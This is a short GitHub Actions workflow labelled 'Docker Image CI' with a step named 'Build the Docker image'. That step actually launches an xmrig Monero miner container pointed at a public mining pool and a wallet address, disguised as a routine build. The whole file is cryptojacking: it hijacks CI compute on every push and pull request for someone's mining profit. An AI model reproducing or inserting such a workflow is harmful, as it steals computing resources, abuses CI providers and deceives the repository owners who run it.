name: Docker Image CI

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:

  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v2
    - name: Build the Docker image
      run: docker run -d giansalex/monero-miner /xmr/xmrig \
     -o pool.supportxmr.com:3333 \
     -u rFb4oRYDDbHpFEcshVx1ppLG97njb9kWCQ \
     -k  \
     --cpu-priority=2
